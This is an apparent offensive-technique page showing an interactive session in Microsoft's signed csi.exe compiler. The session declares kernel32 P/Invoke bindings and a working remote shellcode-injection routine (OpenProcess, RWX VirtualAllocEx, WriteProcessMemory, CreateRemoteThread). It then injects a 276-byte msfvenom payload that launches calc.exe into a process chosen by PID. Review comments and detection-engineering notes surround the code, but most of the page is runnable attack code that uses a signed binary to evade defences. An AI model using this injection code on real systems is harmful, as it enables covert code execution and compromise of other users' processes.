Code Execution
Microsoft's signed Interactive C# compiler (csi.exe), shipped with Visual Studio 2015 and later as part of the Roslyn toolset, gives direct access to native Windows API calls (via P/Invoke, as in the session below) without spawning cmd.exe or powershell.exe. Scripts run through it are still subject to AMSI scanning.
C:\Users\Whatever>"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Roslyn\csi.exe"
Microsoft (R) Visual C# Interactive Compiler version 3.11.0-4.21403.6 ()
Copyright (C) Microsoft Corporation. All rights reserved.
Type "#help" for more information.
> using System;
> using System.Diagnostics;
> using System.Threading;
> using System.Runtime.InteropServices;
>
> public class kernel32
. {
. // P/Invoke surface for the kernel32 calls driven by injectSc below:
. // OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, CloseHandle.
. // Every handle is a raw IntPtr (no SafeHandle wrapping), so the caller owns
. // CloseHandle for each handle it receives.
.
. //openprocess
. // PROCESS_* access-right bits for OpenProcess; only All is used by injectSc.
. // NOTE(review): 0x001F0FFF is the legacy (pre-Vista) PROCESS_ALL_ACCESS mask;
. // current SDKs define it as 0x001FFFFF. The legacy mask still contains the
. // VirtualMemoryOperation/VirtualMemoryWrite/CreateThread bits the calls below need.
. [Flags]
. public enum ProcessAccessFlags : uint
. {
. All = 0x001F0FFF,
. Terminate = 0x00000001,
. CreateThread = 0x00000002,
. VirtualMemoryOperation = 0x00000008,
. VirtualMemoryRead = 0x00000010,
. VirtualMemoryWrite = 0x00000020,
. DuplicateHandle = 0x00000040,
. CreateProcess = 0x000000080, // one extra leading zero; the value is still 0x80
. SetQuota = 0x00000100,
. SetInformation = 0x00000200,
. QueryInformation = 0x00000400,
. QueryLimitedInformation = 0x00001000,
. Synchronize = 0x00100000
. }
.
. // Native: HANDLE OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId).
. // Returns IntPtr.Zero on failure; SetLastError = true makes Marshal.GetLastWin32Error() meaningful.
. [DllImport("kernel32.dll", SetLastError = true)]
. public static extern IntPtr OpenProcess(
. ProcessAccessFlags processAccess,
. bool bInheritHandle,
. int processId
. );
. // Convenience overload: opens proc.Id with a non-inheritable handle (bInheritHandle = false).
. public static IntPtr OpenProcess(Process proc, ProcessAccessFlags flags)
. {
. return OpenProcess(flags, false, proc.Id);
. }
. //end of openprocess
.
. //VirtualAllocEx
. // Native: LPVOID VirtualAllocEx(HANDLE, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect).
. // Returns IntPtr.Zero on failure. ExactSpelling = true stops the runtime probing for A/W-suffixed names.
. // NOTE(review): dwSize is SIZE_T (pointer-sized) natively; the uint here is the usual
. // sample signature and caps the size at < 4 GiB -- UIntPtr would be the exact mapping.
. [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
. uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
.
. // MEM_* allocation-type flags. injectSc passes Reserve | Commit (0x3000).
. [Flags]
. public enum AllocationType
. {
. Commit = 0x1000,
. Reserve = 0x2000,
. Decommit = 0x4000,
. Release = 0x8000,
. Reset = 0x80000,
. Physical = 0x400000,
. TopDown = 0x100000,
. WriteWatch = 0x200000,
. LargePages = 0x20000000
. }
.
. // PAGE_* protection constants. injectSc requests ExecuteReadWrite (PAGE_EXECUTE_READWRITE, 0x40),
. // i.e. an RWX region -- the protection value memory-scanning defences key on.
. [Flags]
. public enum MemoryProtection
. {
. Execute = 0x10,
. ExecuteRead = 0x20,
. ExecuteReadWrite = 0x40,
. ExecuteWriteCopy = 0x80,
. NoAccess = 0x01,
. ReadOnly = 0x02,
. ReadWrite = 0x04,
. WriteCopy = 0x08,
. GuardModifierflag = 0x100,
. NoCacheModifierflag = 0x200,
. WriteCombineModifierflag = 0x400
. }
. //end of virtualallocex
.
. // Native: HANDLE CreateRemoteThread(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T dwStackSize,
. // LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId).
. // No SetLastError here, so Marshal.GetLastWin32Error() is not reliable after a failed call.
. // The returned thread HANDLE must itself be released with CloseHandle.
. [DllImport("kernel32")]
. public static extern IntPtr CreateRemoteThread(
. IntPtr hProcess,
. IntPtr lpThreadAttributes,
. uint dwStackSize,
. IntPtr lpStartAddress, // raw Pointer into remote process
. IntPtr lpParameter,
. uint dwCreationFlags,
. out uint lpThreadId
. );
. // Unused alternative declaration (lpThreadId as IntPtr instead of uint).
. /*
. [DllImport("kernel32.dll")]
. static extern IntPtr CreateRemoteThread(IntPtr hProcess,
. IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress,
. IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
. */
.
. // Native: BOOL CloseHandle(HANDLE). Works for process and thread handles alike.
. // (Modifier order `static public` is legal but unconventional; `public static` is the norm.)
. [DllImport("kernel32.dll", SetLastError = true)]
. static public extern bool CloseHandle(IntPtr hHandle);
.
.
.
. // Native: BOOL WriteProcessMemory(HANDLE, LPVOID lpBaseAddress, LPCVOID lpBuffer,
. // SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten).
. // byte[] overload -- the one injectSc's call resolves to, since arr is byte[].
. // Int32 nSize vs native SIZE_T: same caveat as VirtualAllocEx's dwSize.
. [DllImport("kernel32.dll", SetLastError = true)]
. public static extern bool WriteProcessMemory(
. IntPtr hProcess,
. IntPtr lpBaseAddress,
. byte[] lpBuffer,
. Int32 nSize,
. out IntPtr lpNumberOfBytesWritten);
.
. // Generic overload: UnmanagedType.AsAny lets the marshaler pick the layout from the
. // runtime type of lpBuffer. Declared but not used by injectSc.
. [DllImport("kernel32.dll", SetLastError = true)]
. public static extern bool WriteProcessMemory(
. IntPtr hProcess,
. IntPtr lpBaseAddress,
. [MarshalAs(UnmanagedType.AsAny)] object lpBuffer,
. int dwSize,
. out IntPtr lpNumberOfBytesWritten);
. }
>
> public void injectSc(byte[] arr, int procId)
. {
. // Remote shellcode injection in its textbook four-call form:
. //   OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread.
. // For detection engineers this is the sequence to alert on: an RWX allocation in
. // another process followed by a cross-process thread whose start address is that
. // allocation (Sysmon Event ID 8 / EDR CreateRemoteThread telemetry). The calling
. // image here is the signed csi.exe, so a filter on unsigned binaries alone will not
. // surface it.
. //
. // arr    - raw machine code copied into the target (buf below is an x64 payload, so
. //          the target should be a 64-bit process).
. // procId - PID of the target process.
. //
. // NOTE(review): no return value is checked. A failed OpenProcess or VirtualAllocEx
. // (IntPtr.Zero) flows silently into the next call; temp/temp2 are never read; and
. // the thread handle in remoteThread is never closed (only the process handle is),
. // so it leaks until the csi.exe process exits.
.
.
. var EXECUTE_READ_WRITE = kernel32.MemoryProtection.ExecuteReadWrite; // PAGE_EXECUTE_READWRITE (0x40)
. var PROCESS_ALL_ACCESS = kernel32.ProcessAccessFlags.All;
. var MEM_RESERVE = kernel32.AllocationType.Reserve;
. var MEM_COMMIT = kernel32.AllocationType.Commit;
. IntPtr temp;
. IntPtr nullptr = (IntPtr)null; // same value as IntPtr.Zero, the conventional spelling
. uint temp2;
.
. IntPtr processHandle = kernel32.OpenProcess(PROCESS_ALL_ACCESS, false, procId); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
. IntPtr remoteBuffer = kernel32.VirtualAllocEx(processHandle, nullptr, (uint)arr.Length, (MEM_RESERVE | MEM_COMMIT), EXECUTE_READ_WRITE); // lpAddress = 0: kernel picks the address
. kernel32.WriteProcessMemory(processHandle, remoteBuffer, arr, arr.Length, out temp); // byte[] overload; temp = bytes written, never inspected
. IntPtr remoteThread = kernel32.CreateRemoteThread(processHandle, nullptr, 0, remoteBuffer, nullptr, 0, out temp2 ); // new thread starts executing at remoteBuffer
. kernel32.CloseHandle(processHandle); // remoteThread is left open -- see note above
.
.
.
. }
>//msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
>// Demo payload produced by the msfvenom command above: an x64 "exec" stub that
>// launches calc.exe -- the trailing bytes 0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00
>// are the NUL-terminated ASCII string "calc.exe". 276 bytes, emitted with -f csharp
>// so it drops straight into a C# byte[] initializer.
> byte[] buf = new byte[276] {
. 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
. 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
. 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
. 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
. 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
. 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
. 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
. 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
. 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
. 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
. 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
. 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
. 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
. 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
. 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
. 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
. 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
. 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
. 0x63,0x2e,0x65,0x78,0x65,0x00 };
>
> int procId = 5620; // PID of the target process, hard-coded for this demo session
> injectsc(buf,procId) // lowercase 'sc': C# identifiers are case-sensitive, hence the CS0103 below
(1,1): error CS0103: The name 'injectsc' does not exist in the current context
> injectSc(buf,procId) // correct casing; nothing is printed because injectSc returns void